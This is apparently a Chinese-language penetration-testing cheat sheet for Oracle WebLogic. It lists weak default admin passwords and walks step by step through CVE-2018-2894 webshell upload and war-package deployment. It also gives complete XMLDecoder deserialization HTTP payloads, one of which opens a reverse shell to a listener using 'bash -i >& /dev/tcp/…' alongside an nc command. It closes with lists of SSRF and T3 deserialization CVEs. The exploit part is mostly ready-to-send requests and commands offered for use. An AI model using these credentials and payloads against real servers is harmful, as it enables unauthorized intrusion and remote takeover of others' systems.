1.弱口令
weblogic后台地址:ip:7001/console
常用弱口令:
system:password
weblogic:weblogic
admin:secruity
joe:password
mary:password
system:sercurity
wlcsystem: wlcsystem
weblogic:Oracle@123
2.任意文件上传漏洞(CVE-2018-2894)[部署war包,getshell]
漏洞原理:Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限
漏洞利用:通过未授权访问/ws_utc/config.do页面,修改work home dir的工作目录为另一个未授权即可访问的目录,然后上传文件getshell
影响版本:
text
10.3.6,12.1.3
12.2.1.2,12.2.1.3进入管理后台之后,点击base_domain,再点击高级,启用web服务测试页面,即可访问未授权页面/ws_utc/config.do【Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service
Test Page 在 '生产模式' 下默认不开启,所以该漏洞有一定限制,漏洞存在页面在/ws_utc/config.do。】
访问之后,修改work home dir的目录地址为:/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
之后点击提交
点击安全-添加-上传webshell(可用冰蝎生成jsp),上传成功之后可以看到相应包:
可以看到返回包中有一个时间戳(应该是哈哈的那个id标签),待会要用
打开连接软件,这里我用冰蝎,路径为 http://you-ip/ws_utc/css/config/keystore/\[时间戳\]_\[文件名\]
http://192.168.0.161:7001/ws_utc/css/config/keystore/1628751524774_shell.jsp
即可连接成功
另一种,点击deployments,可看到一个应用列表,点击install
选择upload your files,点击browse上传war包
访问木马文件地址即可
3.XML Decoder反序列化
影响版本
text
10.3.6.0,12.1.3.0.0,12.2.1.1.0漏洞地址
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11利用:
访问
ip:7001/wls-wsat/CoordinatorPortType利用burpsuit抓包,将此页面的get请求包更改为post请求包,poc为:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
<void method="println">
<string>
<![CDATA[
<% out.print("test"); %>
]]>
</string>
</void>
<void method="close"/>
</object></java></java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>访问
your-ip:7001/bea_wls_internal/test.jsp
反弹shell利用
反弹shell
1.nc监听端口 nc -l -p 7089
2.通过burpsuit自行修改数据包,exp改为反弹shell的命令
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: IP:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 640
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/192.168.206.132/7089 0>&1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>效果
4.Weblogic-SSRF漏洞(CVE-2014-4210)
影响版本:
10.0.2, 10.3.6漏洞地址:
http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp5.java反序列化(CVE-2018-2628)
相关历史漏洞
#CVE-2015-4852
Weblogic 直接反序列化
是基于Weblogic t3协议引起远程代码执行的反序列化漏洞
#CVE-2016-0638
Weblogic 直接反序列化
基于Weblogic t3协议引起远程代码执行的反序列化漏洞 漏洞实为CVE-2015-4852绕过 拜Oracle一直以来的黑名单修复方式所赐
#CVE-2016-3510
基于Weblogic t3协议引起远程代码执行的反序列化漏洞
#CVE-2017-3248
基于Weblogic t3协议引起远程代码执行的反序列化漏洞 属于Weblogic JRMP反序列化
#CVE-2018-2628
基于Weblogic t3协议引起远程代码执行的反序列化漏洞 属于 Weblogic JRMP反序列化
#CVE-2018-2893
基于Weblogic t3协议引起远程代码执行的反序列化漏洞 实为CVE-2018-2628绕过 同样拜Oracle一直以来的黑名单修复方式所赐 属于Weblogic JRMP反序列化影响版本
10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3参考
https://zhuanlan.zhihu.com/p/414125709?utm_id=0
https://blog.csdn.net/qq_43593134/article/details/119801840